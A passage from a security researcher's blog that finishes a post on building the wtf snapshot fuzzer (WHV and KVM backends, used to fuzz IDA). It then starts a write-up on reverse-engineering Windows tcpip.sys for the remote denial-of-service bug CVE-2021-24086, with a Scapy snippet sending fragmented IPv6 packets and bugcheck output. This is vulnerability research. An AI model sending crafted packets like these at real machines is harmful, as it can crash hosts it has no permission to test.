is usually hard to figure out in the first place. Another source of non-determinism is the timestamp counter. As far as I can tell, this hasn't led to any major issues though but this might bite us in the future. With the above implemented, I was able to run test cases through the backend end to end which was great. Below I describe some of the problems I solved while testing it. Problem 6: Code coverage breakpoints not free Profiling wtf revealed that my code coverage breakpoints that I thought free were not quite that free. The theory is that they are one-time breakpoints and as a result, you pay for their cost only once. This leads to a warm-up cost that you pay at the start of the run as the fuzzer is discovering sections of code highly reachable. But if you look at it over time, it should become free. The problem in my implementation was in the code used to restore those breakpoints after executing a test case. I tracked the code coverage breakpoints that haven't been hit in a list. When restoring, I would start by restoring every dirty page and I would iterate through this list to reset the code-coverage breakpoints. It turns out this was highly inefficient when you have hundreds of thousands of breakpoints. I did what you usually do when you have a performance problem: I traded CPU time for memory. The answer to this problem is the Ram_t class. The way it works is that every time you add a code coverage breakpoint, it duplicates the page and sets a breakpoint in this page as well as the guest RAM. // // Add a breakpoint to a GPA. // uint8_t *AddBreakpoint(const Gpa_t Gpa) { const Gpa_t AlignedGpa = Gpa.Align(); uint8_t *Page = nullptr; // // Grab the page if we have it in the cache // if (Cache_.contains(Gpa.Align())) { Page = Cache_.at(AlignedGpa); } // // Or allocate and initialize one! // else { Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size); if (Page == nullptr) { fmt::print("Failed to call aligned_alloc.\n"); return nullptr; } const uint8_t *Virgin = Dmp_.GetPhysicalPage(AlignedGpa.U64()) + AlignedGpa.Offset().U64(); if (Virgin == nullptr) { fmt::print( "The dump does not have a page backing GPA {:#x}, exiting.\n", AlignedGpa); return nullptr; } memcpy(Page, Virgin, Page::Size); } // // Apply the breakpoint. // const uint64_t Offset = Gpa.Offset().U64(); Page[Offset] = 0xcc; Cache_.emplace(AlignedGpa, Page); // // And also update the RAM. // Ram_[Gpa.U64()] = 0xcc; return &Page[Offset]; }  When a code coverage breakpoint is hit, the class removes the breakpoint from both of those locations. // // Remove a breakpoint from a GPA. // void RemoveBreakpoint(const Gpa_t Gpa) { const uint8_t *Virgin = GetHvaFromDump(Gpa); uint8_t *Cache = GetHvaFromCache(Gpa); // // Update the RAM. // Ram_[Gpa.U64()] = *Virgin; // // Update the cache. We assume that an entry is available in the cache. // *Cache = *Virgin; }  When you restore dirty memory, you simply iterate through the dirty page and ask the Ram_t class to restore the content of this page. Internally, the class checks if the page has been duplicated and if so it restores from this copy. If it doesn't have, it restores the content from the dump file. This lets us restore code coverage breakpoints at extra memory costs: // // Restore a GPA from the cache or from the dump file if no entry is // available in the cache. // const uint8_t *Restore(const Gpa_t Gpa) { // // Get the HVA for the page we want to restore. // const uint8_t *SrcHva = GetHva(Gpa); // // Get the HVA for the page in RAM. // uint8_t *DstHva = Ram_ + Gpa.Align().U64(); // // It is possible for a GPA to not exist in our cache and in the dump file. // For this to make sense, you have to remember that the crash-dump does not // contain the whole amount of RAM. In which case, the guest OS can decide // to allocate new memory backed by physical pages that were not dumped // because not currently used by the OS. // // When this happens, we simply zero initialize the page as.. this is // basically the best we can do. The hope is that if this behavior is not // correct, the rest of the execution simply explodes pretty fast. // if (!SrcHva) { memset(DstHva, 0, Page::Size); } // // Otherwise, this is straight forward, we restore the source into the // destination. If we had a copy, then that is what we are writing to the // destination, and if we didn't have a copy then we are restoring the // content from the crash-dump. // else { memcpy(DstHva, SrcHva, Page::Size); } // // Return the HVA to the user in case it needs to know about it. // return DstHva; }  Problem 7: Code coverage with IDA I mentioned above that I was using IDA to generate the list of code coverage breakpoints that wtf needed. At first, I thought this was a bulletproof technique but I encountered a pretty annoying bug where IDA was tagging switch-tables as code instead of data. This leads to wtf corrupting switch-tables with cc's and it led to the guest crashing in spectacular ways. I haven't run into this bug with the latest version of IDA yet which was nice. Problem 8: Rounds of optimization After profiling the fuzzer, I noticed that WHvQueryGpaRangeDirtyBitmap was extremely slow for unknown reasons. To fix this, I ended up emulating the feature by mapping memory as read / execute in the EPT and track dirtiness when receiving a memory fault doing a write. HRESULT WhvBackend_t::OnExitReasonMemoryAccess( const WHV_RUN_VP_EXIT_CONTEXT &Exception) { const Gpa_t Gpa = Gpa_t(Exception.MemoryAccess.Gpa); const bool WriteAccess = Exception.MemoryAccess.AccessInfo.AccessType == WHvMemoryAccessWrite; if (!WriteAccess) { fmt::print("Dont know how to handle this fault, exiting.\n"); __debugbreak(); return E_FAIL; } // // Remap the page as writeable. // const WHV_MAP_GPA_RANGE_FLAGS Flags = WHvMapGpaRangeFlagWrite | WHvMapGpaRangeFlagRead | WHvMapGpaRangeFlagExecute; const Gpa_t AlignedGpa = Gpa.Align(); DirtyGpa(AlignedGpa); uint8_t *AlignedHva = PhysTranslate(AlignedGpa); return MapGpaRange(AlignedHva, AlignedGpa, Page::Size, Flags); }  Once fixed, I noticed that WHvTranslateGva also was slower than I expected. This is why I also emulated its behavior by walking the page tables myself: HRESULT WhvBackend_t::TranslateGva(const Gva_t Gva, const WHV_TRANSLATE_GVA_FLAGS, WHV_TRANSLATE_GVA_RESULT &TranslationResult, Gpa_t &Gpa) const { // // Stole most of the logic from @yrp604's code so thx bro. // const VIRTUAL_ADDRESS GuestAddress = Gva.U64(); const MMPTE_HARDWARE Pml4 = GetReg64(WHvX64RegisterCr3); const uint64_t Pml4Base = Pml4.PageFrameNumber * Page::Size; const Gpa_t Pml4eGpa = Gpa_t(Pml4Base + GuestAddress.Pml4Index * 8); const MMPTE_HARDWARE Pml4e = PhysRead8(Pml4eGpa); if (!Pml4e.Present) { TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent; return S_OK; } const uint64_t PdptBase = Pml4e.PageFrameNumber * Page::Size; const Gpa_t PdpteGpa = Gpa_t(PdptBase + GuestAddress.PdPtIndex * 8); const MMPTE_HARDWARE Pdpte = PhysRead8(PdpteGpa); if (!Pdpte.Present) { TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent; return S_OK; } // // huge pages: // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page // directory; see Table 4-1 // const uint64_t PdBase = Pdpte.PageFrameNumber * Page::Size; if (Pdpte.LargePage) { TranslationResult.ResultCode = WHvTranslateGvaResultSuccess; Gpa = Gpa_t(PdBase + (Gva.U64() & 0x3fff'ffff)); return S_OK; } const Gpa_t PdeGpa = Gpa_t(PdBase + GuestAddress.PdIndex * 8); const MMPTE_HARDWARE Pde = PhysRead8(PdeGpa); if (!Pde.Present) { TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent; return S_OK; } // // large pages: // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page // table; see Table 4-18 // const uint64_t PtBase = Pde.PageFrameNumber * Page::Size; if (Pde.LargePage) { TranslationResult.ResultCode = WHvTranslateGvaResultSuccess; Gpa = Gpa_t(PtBase + (Gva.U64() & 0x1f'ffff)); return S_OK; } const Gpa_t PteGpa = Gpa_t(PtBase + GuestAddress.PtIndex * 8); const MMPTE_HARDWARE Pte = PhysRead8(PteGpa); if (!Pte.Present) { TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent; return S_OK; } TranslationResult.ResultCode = WHvTranslateGvaResultSuccess; const uint64_t PageBase = Pte.PageFrameNumber * 0x1000; Gpa = Gpa_t(PageBase + GuestAddress.Offset); return S_OK; }  Collecting dividends Comparing the two backends, whv showed about 15x better performance over bochscpu. I honestly was a bit disappointed as I expected more of a 100x performance increase but I guess it was still a significant perf increase: bochscpu: #1 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 0.0s crash: 0 timeout: 0 cr3: 0 #2 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 12.0s crash: 0 timeout: 0 cr3: 0 #3 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 25.0s crash: 0 timeout: 0 cr3: 0 #4 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 38.0s crash: 0 timeout: 0 cr3: 0 whv: #12 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 6.0s crash: 0 timeout: 0 cr3: 0 #30 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 16.0s crash: 0 timeout: 0 cr3: 0 #48 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 27.0s crash: 0 timeout: 0 cr3: 0 #66 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 37.0s crash: 0 timeout: 0 cr3: 0 #84 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 47.0s crash: 0 timeout: 0 cr3: 0  The speed started to be good enough for me to run it overnight and discover my first few crashes which was exciting even though they were just interr. 2 fast 2 furious: KVM backend I really wanted to start fuzzing IDA on some proper hardware. It was pretty clear that renting Windows machines in the cloud with nested virtualization enabled wasn't something widespread or cheap. On top of that, I was still disappointed by the performance of whv and so I was eager to see how battle-tested hypervisors like Xen or KVM would measure. I didn't know anything about those VMM but I quickly discovered that KVM was available in the Linux kernel and that it exposed a user-mode API that resembled whv via /dev/kvm. This looked perfect because if it was similar enough to whv I could probably write a backend for it easily. The KVM API powers Firecracker that is a project creating micro vms to run various workloads in the cloud. I assumed that you would need rich features as well as good performance to be the foundation technology of this project. KVM APIs worked very similarly to whv and as a result, I will not repeat the previous part. Instead, I will just walk you through some of the differences and things I enjoyed more with KVM. GPRs available through shared-memory To avoid sending an IOCTL every time you want the value of the guest GPR, KVM allows you to map a shared memory region with the kernel where the registers are laid out: // // Get the size of the shared kvm run structure. // VpMmapSize_ = ioctl(Kvm_, KVM_GET_VCPU_MMAP_SIZE, 0); if (VpMmapSize_ < 0) { perror("Could not get the size of the shared memory region."); return false; } // // Man says: // there is an implicit parameter block that can be obtained by mmap()'ing // the vcpu fd at offset 0, with the size given by KVM_GET_VCPU_MMAP_SIZE. // Run_ = (struct kvm_run *)mmap(nullptr, VpMmapSize_, PROT_READ | PROT_WRITE, MAP_SHARED, Vp_, 0); if (Run_ == nullptr) { perror("mmap VCPU_MMAP_SIZE"); return false; }  On-demand paging Implementing on demand paging with KVM was very easy. It uses userfaultfd and so you can just start a thread that polls and that services the requests: void KvmBackend_t::UffdThreadMain() { while (!UffdThreadStop_) { // // Set up the pool fd with the uffd fd. // struct pollfd PoolFd = {.fd = Uffd_, .events = POLLIN}; int Res = poll(&PoolFd, 1, 6000); if (Res < 0) { // // Sometimes poll returns -EINTR when we are trying to kick off the CPU // out of KVM_RUN. // if (errno == EINTR) { fmt::print("Poll returned EINTR\n"); continue; } perror("poll"); exit(EXIT_FAILURE); } // // This is the timeout, so we loop around to have a chance to check for // UffdThreadStop_. // if (Res == 0) { continue; } // // You get the address of the access that triggered the missing page event // out of a struct uffd_msg that you read in the thread from the uffd. You // can supply as many pages as you want with UFFDIO_COPY or UFFDIO_ZEROPAGE. // Keep in mind that unless you used DONTWAKE then the first of any of those // IOCTLs wakes up the faulting thread. // struct uffd_msg UffdMsg; Res = read(Uffd_, &UffdMsg, sizeof(UffdMsg)); if (Res < 0) { perror("read"); exit(EXIT_FAILURE); } // // Let's ensure we are dealing with what we think we are dealing with. // if (Res != sizeof(UffdMsg) || UffdMsg.event != UFFD_EVENT_PAGEFAULT) { fmt::print("The uffdmsg or the type of event we received is unexpected, " "bailing."); exit(EXIT_FAILURE); } // // Grab the HVA off the message. // const uint64_t Hva = UffdMsg.arg.pagefault.address; // // Compute the GPA from the HVA. // const Gpa_t Gpa = Gpa_t(Hva - uint64_t(Ram_.Hva())); // // Page it in. // RunStats_.UffdPages++; const uint8_t *Src = Ram_.GetHvaFromDump(Gpa); if (Src != nullptr) { const struct uffdio_copy UffdioCopy = { .dst = Hva, .src = uint64_t(Src), .len = Page::Size, }; // // The primary ioctl to resolve userfaults is UFFDIO_COPY. That atomically // copies a page into the userfault registered range and wakes up the // blocked userfaults (unless uffdio_copy.mode & UFFDIO_COPY_MODE_DONTWAKE // is set). Other ioctl works similarly to UFFDIO_COPY. They’re atomic as // in guaranteeing that nothing can see an half copied page since it’ll // keep userfaulting until the copy has finished. // Res = ioctl(Uffd_, UFFDIO_COPY, &UffdioCopy); if (Res < 0) { perror("UFFDIO_COPY"); exit(EXIT_FAILURE); } } else { const struct uffdio_zeropage UffdioZeroPage = { .range = {.start = Hva, .len = Page::Size}}; Res = ioctl(Uffd_, UFFDIO_ZEROPAGE, &UffdioZeroPage); if (Res < 0) { perror("UFFDIO_ZEROPAGE"); exit(EXIT_FAILURE); } } } }  Timeout Another cool thing is that KVM exposes the Performance Monitoring Unit to the guests if the hardware supports it. When the hardware supports it, I am able to program the PMU to trigger an interruption after an arbitrary number of retired instructions. This is useful because when MSR_IA32_FIXED_CTR0 overflows, it triggers a special interruption called a PMI that gets delivered via the vector 0xE of the CPU's IDT. To catch it, we simply break on hal!HalPerfInterrupt: // // This is to catch the PMI interrupt if performance counters are used to // bound execution. // if (!g_Backend->SetBreakpoint("hal!HalpPerfInterrupt", [](Backend_t *Backend) { CrashDetectionPrint("Perf interrupt\n"); Backend->Stop(Timedout_t()); })) { fmt::print("Could not set a breakpoint on hal!HalpPerfInterrupt, but " "carrying on..\n"); }  To make it work you have to program the APIC a little bit and I remember struggling to get the interruption fired. I am still not 100% sure that I got the details fully right but the interruption triggered consistently during my tests and so I called it a day. I would also like to revisit this area in the future as there might be other features I could use for the fuzzer. Problem 9: Running it in the cloud The KVM backend development was done on a laptop in a Hyper-V VM with nested virtualization on. It worked great but it was not powerful and so I wanted to run it on real hardware. After shopping around, I realized that Amazon didn't have any offers that supported nested virtualization and that only Microsoft's Azure had available SKUs with nested virtualization on. I rented one of them to try it out and the hardware didn't support this VMX feature called unrestricted_guest. I can't quite remember why it mattered but it had to do with real mode & the APIC and the way I create memory slots. I had developed the backend assuming this feature would be here and so I didn't use Azure either. Instead, I rented a bare-metal server on vultr for about 100 / mo. The CPU was a Xeon E3-1270v6 processor, 4 cores, 8 threads @ 3.8GHz which seemed good enough for my usage. The hardware had a PMU and that is where I developed the support for it in wtf as well.

I was pretty happy because the fuzzer was running about 10x faster than whv. It is not a fair comparison because those numbers weren't acquired from the same hardware but still:

#123 cov: 25521 corp: 0 exec/s: 12.3 lastcov: 9.0s crash: 0 timeout: 0 cr3: 0
#252 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 19.0s crash: 0 timeout: 0 cr3: 0
#381 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 29.0s crash: 0 timeout: 0 cr3: 0
#510 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 39.0s crash: 0 timeout: 0 cr3: 0
#639 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 49.0s crash: 0 timeout: 0 cr3: 0
#768 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 59.0s crash: 0 timeout: 0 cr3: 0
#897 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 1.1min crash: 0 timeout: 0 cr3: 0


To give you more details, this test case used generated executions of around 195 millions instructions with the following stats (generated by bochscpu):

Run stats:
Instructions executed: 194593453 (260546 unique)
Dirty pages: 9166848 bytes (0 MB)
Memory accesses: 411196757 bytes (24 MB)


Problem 10: Minsetting a 1.6m files corpus

In parallel with coding wtf, I acquired a fairly large corpus made of the weirdest ELF possible. I built this corpus made of 1.6 million ELF files and I now needed to minset it. Because of the way I had architected wtf, minsetting was a serial process. I could have gone the AFL route and generate execution traces that eventually get merged together but I didn't like this idea either.

Instead, I re-architected wtf into a client and a server. The server owns the coverage, the corpus, and the mutator. It just distributes test cases to clients and receives code coverage reports from them. You can see the clients are runners that send back results to the server. All the important state is kept in the server.

This model was nice because it automatically meant that I could fully utilize the hardware I was renting to minset those files. As an example, minsetting this corpus of files with a single core would have probably taken weeks to complete but it took 8 hours with this new architecture:

#1972714 cov: 74065 corp: 3176 (58mb) exec/s: 64.2 (8 nodes) lastcov: 3.0s crash: 49 timeout: 71 cr3: 48 uptime: 8hr


Wrapping up

In this post we went through the birth of wtf which is a distributed, code-coverage guided, customizable, cross-platform snapshot-based fuzzer designed for attacking user and/or kernel-mode targets running on Microsoft Windows. It also led to writing and open-sourcing a number of other small projects: lockmem, inject, kdmp-parser and symbolizer.

We went from zero to dozens of unique crashes in various IDA components: libdwarf64.dll, dwarf64.dll, elf64.dll and pdb64.dll. The findings were really diverse: null-dereference, stack-overflows, division by zero, infinite loops, use-after-frees, and out-of-bounds accesses. I have compiled all of my findings in the following Github repository: fuzzing-ida75.

I probably fuzzed for an entire month but most of the crashes popped up in the first two weeks. According to lighthouse, I managed to cover about 80% of elf64.dll, 50% of dwarf64.dll and 26% of libdwarf64.dll with a minset of about 2.4k files for a total of 17MB.

Before signing out, I wanted to thank the IDA Hex-Rays team for handling & fixing my reports at an amazing speed. I would highly recommend for you to try out their bounty as I am sure there's a lot to be found.

Reverse-engineering tcpip.sys: mechanics of a packet of the death (CVE-2021-24086)

15 April 2021 at 15:00

Introduction

Since the beginning of my journey in computer security I have always been amazed and fascinated by true remote vulnerabilities. By true remotes, I mean bugs that are triggerable remotely without any user interaction. Not even a single click. As a result I am always on the lookout for such vulnerabilities.

On the Tuesday 13th of October 2020, Microsoft released a patch for CVE-2020-16898 which is a vulnerability affecting Windows' tcpip.sys kernel-mode driver dubbed Bad neighbor. Here is the description from Microsoft:

A remote code execution vulnerability exists when the Windows TCP/IP stack improperly
handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain
the ability to execute code on the target server or client. To exploit this vulnerability, an attacker would have
to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.
packets.


The vulnerability really did stand out to me: remote vulnerabilities affecting TCP/IP stacks seemed extinct and being able to remotely trigger a memory corruption in the Windows kernel is very interesting for an attacker. Fascinating.

Hadn't diffed Microsoft patches in years I figured it would be a fun exercise to go through. I knew that I wouldn't be the only one working on it as those unicorns get a lot of attention from internet hackers. Indeed, my friend pi3 was so fast to diff the patch, write a PoC and write a blogpost that I didn't even have time to start, oh well :)

That is why when Microsoft blogged about another set of vulnerabilities being fixed in tcpip.sys I figured I might be able to work on those this time. Again, I knew for a fact that I wouldn't be the only one racing to write the first public PoC for CVE-2021-24086 but somehow the internet stayed silent long enough for me to complete this task which is very surprising :)

In this blogpost I will take you on my journey from zero to BSoD. From diffing the patches, reverse-engineering tcpip.sys and fighting our way through writing a PoC for CVE-2021-24086. If you came here for the code, fair enough, it is available on my github: 0vercl0k/CVE-2021-24086.

TL;DR

For the readers that want to get the scoop, CVE-2021-24086 is a NULL dereference in tcpip!Ipv6pReassembleDatagram that can be triggered remotely by sending a series of specially crafted packets. The issue happens because of the way the code treats the network buffer:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
// ...
const uint32_t UnfragmentableLength = Reassembly->UnfragmentableLength;
const uint32_t TotalLength = UnfragmentableLength + Reassembly->DataLength;
// …
NetBufferList = (_NET_BUFFER_LIST *)NetioAllocateAndReferenceNetBufferAndNetBufferList(
IppReassemblyNetBufferListsComplete,
Reassembly,
0,
0,
0,
0);
if ( !NetBufferList )
{
// ...
goto Bail_0;
}

FirstNetBuffer = NetBufferList->FirstNetBuffer;
if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )
{
// ...
goto Bail_1;
}

//...
*Buffer = Reassembly->Ipv6;


A fresh NetBufferList (abbreviated NBL) is allocated by NetioAllocateAndReferenceNetBufferAndNetBufferList and NetioRetreatNetBuffer allocates a Memory Descriptor List (abbreviated MDL) of uint16_t(HeaderAndOptionsLength) bytes. This integer truncation from uint32_t is important.

Once the network buffer has been allocated, NdisGetDataBuffer is called to gain access to a contiguous block of data from the fresh network buffer. This time though, HeaderAndOptionsLength is not truncated which allows an attacker to trigger a special condition in NdisGetDataBuffer to make it fail. This condition is hit when uint16_t(HeaderAndOptionsLength) != HeaderAndOptionsLength. When the function fails, it returns NULL and Ipv6pReassembleDatagram blindly trusts this pointer and does a memory write, bugchecking the machine. To pull this off, you need to trick the network stack into receiving an IPv6 fragment with a very large amount of headers. Here is what the bugchecks look like:

KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000d1
(0x0000000000000000,0x0000000000000002,0x0000000000000001,0xFFFFF8054A5CDEBB)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff805473c46a0 cc              int     3

kd> kc
# Call Site
00 nt!DbgBreakPointWithStatus
01 nt!KiBugCheckDebugBreak
02 nt!KeBugCheck2
03 nt!KeBugCheckEx
04 nt!KiBugCheckDispatch
05 nt!KiPageFault
06 tcpip!Ipv6pReassembleDatagram
0e nt!KeExpandKernelStackAndCalloutInternal
0f nt!KeExpandKernelStackAndCalloutEx
11 NDIS!ndisMIndicateNetBufferListsToOpen


For anybody else in for a long ride, let's get to it :)

Recon

Even though Francisco Falcon already wrote a cool blogpost discussing his work on this case, I have decided to also write up mine; I'll try to cover aspects that are less or not covered in his post like tcpip.sys internals for example.

All right, let's start by the beginning: at this point I don't know anything about tcpip.sys and I don't know anything about the bugs getting patched. Microsoft's blogpost is helpful because it gives us a bunch of clues:

• There are three different vulnerabilities that seemed to involve fragmentation in IPv4 & IPv6,
• Two of them are rated as Remote Code Execution which means that they cause memory corruption somehow,
• One of them causes a DoS which means somehow it likely bugchecks the target.

According to this tweet we also learn that those flaws have been internally found by Microsoft's own @piazzt which is awesome.

Googling around also reveals a bunch more useful information due to the fact that it would seem that Microsoft privately shared with their partners PoCs via the MAPP program.

At this point I decided to focus on the DoS vulnerability (CVE-2021-2486) as a first step. I figured it might be easier to trigger and that I might be able to use the acquired knowledge for triggering it to understand better tcpip.sys and maybe work on the other ones if time and motivation allows.

The next logical step is to diff the patches to identify the fixes.

Diffing Microsoft patches in 2021

I honestly can't remember the last time I diff'd Microsoft patches. Probably Windows XP / Windows 7 time to be honest. Since then, a lot has changed though. The security updates are now cumulative, which means that packages embed every fix known to date. You can grab packages directly from the Microsoft Update Catalog which is handy. Last but not least, Windows Updates now use forward / reverse differentials; you can read this to know more about what it means.

Extracting and Diffing Windows Patches in 2020 is a great blog post that talks about how to unpack the patches off an update package and how to apply the differentials. The output of this work is basically the tcpip.sys binary before and after the update. If you don't feel like doing this yourself, I've uploaded the two binaries (as well as their respective public PDBs) that you can use to do the diffing yourself: 0vercl0k/CVE-2021-24086/binaries. Also, I have been made aware after publishing this post about the amazing winbindex website which indexes Windows binaries and lets you download them in a click. Here is the index available for tcpip.sys as an example.

Once we have the before and after binaries, a little dance with IDA and the good ol’ BinDiff yields the below:

There aren't a whole lot of changes to look at which is nice, and focusing on Ipv6pReassembleDatagram feels right. Microsoft's workaround mentioned disabling packet reassembly (netsh int ipv6 set global reassemblylimit=0) and this function seems to be reassembling datagrams; close enough right?

After looking at it for a little time, the patched binary introduced this new interesting looking basic block:

It ends with what looks like a comparison with the 0xffff integer and a conditional jump that either bails out or keeps going. This looks very interesting because some articles mentioned that the bug could be triggered with a packet containing a large amount of headers. Not that you should trust those types of news articles as they are usually not technically accurate and sensationalized, but there might be some truth to it. At this point, I felt pretty good about it and decided to stop diffing and start reverse-engineering. I assumed the issue would be some sort of integer overflow / truncation that would be easy to trigger based on the name of the function. We just need to send a big packet right?

Reverse-engineering tcpip.sys

This is where the real journey and the usual emotional rollercoasters when studying vulnerabilities. I initially thought I would be done with this in a few days, or a week. Oh boy, I was wrong though.

Baby steps

First thing I did was to prepare a lab environment. I installed a Windows 10 (target) and a Linux VM (attacker), set-up KDNet and kernel debugging to debug the target, installed Wireshark / Scapy (v2.4.4), created a virtual switch which the two VMs are sharing. And... finally loaded tcpip.sys in IDA. The module looked pretty big and complex at first sights - no big surprise there; it implements Windows IPv4 & IPv6 network stack after all. I started the adventure by focusing first on Ipv6pReassembleDatagram. Here is the piece of assembly code that we saw earlier in BinDiff and that looked interesting:

Great, that's a start. Before going deep down the rabbit hole of reverse-engineering, I decided to try to hit the function and be able to debug it with WinDbg. As the function name suggests reassembly I wrote the following code and threw it against my target:

from scapy.all import *

pkt = Ether() / IPv6(dst = 'ff02::1') / UDP() / ('a' * 0x1000)
sendp(fragment6(pkt, 500), iface = 'eth1')


This successfully triggers the breakpoint in WinDbg; neat:

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff8022edcdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

kd> kc
# Call Site
00 tcpip!Ipv6pReassembleDatagram
08 nt!KeExpandKernelStackAndCalloutInternal
09 nt!KeExpandKernelStackAndCalloutEx


We can even observe the fragmented packets in Wireshark which is also pretty cool:

For those that are not familiar with packet fragmentation, it is a mechanism used to chop large packets (larger than the Maximum Transmission Unit) in smaller chunks to be able to be sent across network equipment. The receiving network stack has the burden to stitch them all together in a safe manner (winkwink).

All right, perfect. We have now what I consider a good enough research environment and we can start digging deep into the code. At this point, let's not focus on the vulnerability yet but instead try to understand how the code works, the type of arguments it receives, recover structures and the semantics of important fields, etc. Let's get our HexRays decompilation output pretty.

As you might imagine, this is the part that's the most time consuming. I use a mixture of bottom-up, top-down. Loads of experiments. Commenting the decompiled code as best as I can, challenging myself by asking questions, answering them, rinse & repeat.

High level overview

Oftentimes, studying code / features in isolation in complex systems is not enough; it only takes you so far. Complex drivers like tcpip.sys are gigantic, carry a lot of state, and are hard to reason about, both in terms of execution and data flow. In this case, there is this sort of size integer, that seems to be related to something that got received and we want to set that to 0xffff. Unfortunately, just focusing on Ipv6pReassembleDatagram and Ipv6pReceiveFragment was not enough for me to make significant progress. It was worth a try though but time to switch gears.

Zooming out

All right, that's cool, our HexRays decompiled code is getting prettier and prettier; it feels rewarding. We have abused the create new structure feature to lift a bunch of structures. We guessed about the semantics of some of them but most are still unknown. So yeah, let's work smarter.

We know that tcpip.sys receives packets from the network; we don't know exactly how or where from but maybe we don't need to know that much. One of the first questions you might ask yourself is how the kernel stores network data? What structures does it use?

NET_BUFFER & NET_BUFFER_LIST

If you have some Windows kernel experience, you might be familiar with NDIS and you might also have heard about some of the APIs and the structures it exposes to users. It is documented because third-parties can develop extensions and drivers to interact with the network stack at various points.

An important structure in this world is NET_BUFFER. This is what it looks like in WinDbg:

kd> dt NDIS!_NET_BUFFER
NDIS!_NET_BUFFER
+0x000 Next             : Ptr64 _NET_BUFFER
+0x008 CurrentMdl       : Ptr64 _MDL
+0x010 CurrentMdlOffset : Uint4B
+0x018 DataLength       : Uint4B
+0x018 stDataLength     : Uint8B
+0x020 MdlChain         : Ptr64 _MDL
+0x028 DataOffset       : Uint4B
+0x030 ChecksumBias     : Uint2B
+0x032 Reserved         : Uint2B
+0x038 NdisPoolHandle   : Ptr64 Void
+0x040 NdisReserved     : [2] Ptr64 Void
+0x050 ProtocolReserved : [6] Ptr64 Void
+0x080 MiniportReserved : [4] Ptr64 Void
+0x0a8 SharedMemoryInfo : Ptr64 _NET_BUFFER_SHARED_MEMORY
+0x0a8 ScatterGatherList : Ptr64 _SCATTER_GATHER_LIST


It can look overwhelming but we don't need to understand every detail. What is important is that the network data are stored in a regular MDL. As MDLs, NET_BUFFER can be chained together which allows the kernel to store a large amount of data in a bunch of non-contiguous chunks of physical memory; virtual memory is the magic wand used to make the data look contiguous. For the readers that are not familiar with Windows kernel development, an MDL is a Windows kernel construct that allows users to map physical memory in a contiguous virtual memory region. Every MDL is actually followed by a list of PFNs (which don't need to be contiguous) that the Windows kernel is able to map in a contiguous virtual memory region; magic.

kd> dt nt!_MDL
+0x000 Next             : Ptr64 _MDL
+0x008 Size             : Int2B
+0x00a MdlFlags         : Int2B
+0x00c AllocationProcessorNumber : Uint2B
+0x00e Reserved         : Uint2B
+0x010 Process          : Ptr64 _EPROCESS
+0x018 MappedSystemVa   : Ptr64 Void
+0x020 StartVa          : Ptr64 Void
+0x028 ByteCount        : Uint4B
+0x02c ByteOffset       : Uint4B


NET_BUFFER_LIST are basically a structure to keep track of a list of NET_BUFFERs as the name suggests:

kd> dt NDIS!_NET_BUFFER_LIST
+0x000 Next             : Ptr64 _NET_BUFFER_LIST
+0x008 FirstNetBuffer   : Ptr64 _NET_BUFFER
+0x010 Context          : Ptr64 _NET_BUFFER_LIST_CONTEXT
+0x018 ParentNetBufferList : Ptr64 _NET_BUFFER_LIST
+0x020 NdisPoolHandle   : Ptr64 Void
+0x030 NdisReserved     : [2] Ptr64 Void
+0x040 ProtocolReserved : [4] Ptr64 Void
+0x060 MiniportReserved : [2] Ptr64 Void
+0x070 Scratch          : Ptr64 Void
+0x078 SourceHandle     : Ptr64 Void
+0x080 NblFlags         : Uint4B
+0x084 ChildRefCount    : Int4B
+0x088 Flags            : Uint4B
+0x08c Status           : Int4B
+0x08c NdisReserved2    : Uint4B
+0x090 NetBufferListInfo : [29] Ptr64 Void


Again, no need to understand every detail, thinking in concepts is good enough. On top of that, Microsoft makes our life easier by providing a very useful WinDbg extension called ndiskd. It exposes two functions to dump NET_BUFFER and NET_BUFFER_LIST: !ndiskd.nb and !ndiskd.nbl respectively. These are a big time saver because they'll take care of walking the various levels of indirection: list of NET_BUFFERs and chains of MDLs.

The mechanics of parsing an IPv6 packet

Now that we know where and how network data is stored, we can ask ourselves how IPv6 packet parsing works? I have very little knowledge about networking, but I know that there are various headers that need to be parsed differently and that they can chain together. The layer N tells you what you'll find next.

What I am about to describe is what I have figured out while reverse-engineering as well as what I have observed during debugging it through a bazillions of experiments. Full disclosure: I am no expert so take it with a grain of salt :)

The top level function of interest is IppReceiveHeaderBatch. The first thing it does is to invoke IppReceiveHeadersHelper on every packet that are in the list:

if ( Packet )
{
do
{
Next = Packet->Next;
Packet->Next = 0;
Packet = Next;
}
while ( Next );
}


